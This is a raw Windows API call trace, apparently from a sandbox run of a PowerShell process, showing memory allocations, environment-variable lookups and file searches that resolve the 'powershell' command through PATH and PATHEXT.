	[0426.456] VirtualQuery (in: lpAddress=0x1c83dc60, lpBuffer=0x1c83eb20, dwLength=0x30 | out: lpBuffer=0x1c83eb20*(BaseAddress=0x1c83d000, AllocationBase=0x1beb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0426.459] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad620
	[0426.459] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.459] CoTaskMemFree (pv=0x1b8ad620) 
	[0426.461] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad620
	[0426.462] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.462] CoTaskMemFree (pv=0x1b8ad620) 
	[0426.465] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad620
	[0426.465] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.465] CoTaskMemFree (pv=0x1b8ad620) 
	[0426.481] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad620
	[0426.481] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.481] CoTaskMemFree (pv=0x1b8ad620) 
	[0426.484] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad620
	[0426.484] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.484] CoTaskMemFree (pv=0x1b8ad620) 
	[0426.485] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad620
	[0426.485] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.485] CoTaskMemFree (pv=0x1b8ad620) 
	[0426.490] VirtualQuery (in: lpAddress=0x1c83df10, lpBuffer=0x1c83edd0, dwLength=0x30 | out: lpBuffer=0x1c83edd0*(BaseAddress=0x1c83d000, AllocationBase=0x1beb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0426.491] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad620
	[0426.491] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.491] CoTaskMemFree (pv=0x1b8ad620) 
	[0426.713] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad620
	[0426.713] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.713] CoTaskMemFree (pv=0x1b8ad620) 
	[0426.713] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad620
	[0426.713] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.713] CoTaskMemFree (pv=0x1b8ad620) 
	[0426.714] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad620
	[0426.714] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.714] CoTaskMemFree (pv=0x1b8ad620) 
	[0426.719] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad620
	[0426.719] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.719] CoTaskMemFree (pv=0x1b8ad620) 
	[0427.109] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad620
	[0427.109] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0427.109] CoTaskMemFree (pv=0x1b8ad620) 
	[0427.111] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad620
	[0427.112] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0427.112] CoTaskMemFree (pv=0x1b8ad620) 
	[0427.113] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad620
	[0427.113] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0427.113] CoTaskMemFree (pv=0x1b8ad620) 
	[0427.115] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad620
	[0427.115] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0427.115] CoTaskMemFree (pv=0x1b8ad620) 
	[0427.117] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad620
	[0427.117] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0427.117] CoTaskMemFree (pv=0x1b8ad620) 
	[0427.118] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad620
	[0427.118] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0427.118] CoTaskMemFree (pv=0x1b8ad620) 
	[0427.120] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad620
	[0427.120] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0427.120] CoTaskMemFree (pv=0x1b8ad620) 
	[0427.358] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad620
	[0427.358] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0427.358] CoTaskMemFree (pv=0x1b8ad620) 
	[0427.651] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad620
	[0427.651] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b8ad620, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0427.651] CoTaskMemFree (pv=0x1b8ad620) 
	[0427.654] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad620
	[0427.654] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b8ad620, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0427.654] CoTaskMemFree (pv=0x1b8ad620) 
	[0427.654] CoTaskMemAlloc (cb=0x128) returned 0x1b89b5b0
	[0427.654] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b89b5b0, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0427.654] CoTaskMemFree (pv=0x1b89b5b0) 
	[0427.659] CoTaskMemAlloc (cb=0x20e) returned 0x1b8981b0
	[0427.659] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b8981b0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0427.659] CoTaskMemFree (pv=0x1b8981b0) 
	[0427.664] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0427.665] SetErrorMode (uMode=0x1) returned 0x1
	[0427.668] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0427.990] SetErrorMode (uMode=0x1) returned 0x1
	[0427.991] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0427.992] SetErrorMode (uMode=0x1) returned 0x1
	[0427.992] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.000] SetErrorMode (uMode=0x1) returned 0x1
	[0428.001] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0428.001] SetErrorMode (uMode=0x1) returned 0x1
	[0428.001] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.011] SetErrorMode (uMode=0x1) returned 0x1
	[0428.012] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0428.013] SetErrorMode (uMode=0x1) returned 0x1
	[0428.013] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.021] SetErrorMode (uMode=0x1) returned 0x1
	[0428.022] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0428.022] SetErrorMode (uMode=0x1) returned 0x1
	[0428.022] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.031] SetErrorMode (uMode=0x1) returned 0x1
	[0428.033] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0428.033] SetErrorMode (uMode=0x1) returned 0x1
	[0428.033] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.261] SetErrorMode (uMode=0x1) returned 0x1
	[0428.262] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0428.262] SetErrorMode (uMode=0x1) returned 0x1
	[0428.263] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.271] SetErrorMode (uMode=0x1) returned 0x1
	[0428.272] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0428.272] SetErrorMode (uMode=0x1) returned 0x1
	[0428.272] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.281] SetErrorMode (uMode=0x1) returned 0x1
	[0428.282] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0428.282] SetErrorMode (uMode=0x1) returned 0x1
	[0428.282] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.291] SetErrorMode (uMode=0x1) returned 0x1
	[0428.292] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0428.293] SetErrorMode (uMode=0x1) returned 0x1
	[0428.293] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.472] SetErrorMode (uMode=0x1) returned 0x1
	[0428.473] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0428.474] SetErrorMode (uMode=0x1) returned 0x1
	[0428.474] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.482] SetErrorMode (uMode=0x1) returned 0x1
	[0428.483] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0428.483] SetErrorMode (uMode=0x1) returned 0x1
	[0428.483] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.491] SetErrorMode (uMode=0x1) returned 0x1
	[0428.492] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0428.492] SetErrorMode (uMode=0x1) returned 0x1
	[0428.492] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.500] SetErrorMode (uMode=0x1) returned 0x1
	[0428.501] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0428.501] SetErrorMode (uMode=0x1) returned 0x1
	[0428.502] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.682] SetErrorMode (uMode=0x1) returned 0x1
	[0428.684] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0428.684] SetErrorMode (uMode=0x1) returned 0x1
	[0428.684] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.707] SetErrorMode (uMode=0x1) returned 0x1
	[0428.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0428.709] SetErrorMode (uMode=0x1) returned 0x1
	[0428.709] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.709] SetErrorMode (uMode=0x1) returned 0x1
	[0428.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0428.710] SetErrorMode (uMode=0x1) returned 0x1
	[0428.710] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.710] SetErrorMode (uMode=0x1) returned 0x1
	[0428.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0428.710] SetErrorMode (uMode=0x1) returned 0x1
	[0428.710] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.711] SetErrorMode (uMode=0x1) returned 0x1
	[0428.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0428.711] SetErrorMode (uMode=0x1) returned 0x1
	[0428.711] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.711] SetErrorMode (uMode=0x1) returned 0x1
	[0428.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0428.712] SetErrorMode (uMode=0x1) returned 0x1
	[0428.712] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.712] SetErrorMode (uMode=0x1) returned 0x1
	[0428.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0428.712] SetErrorMode (uMode=0x1) returned 0x1
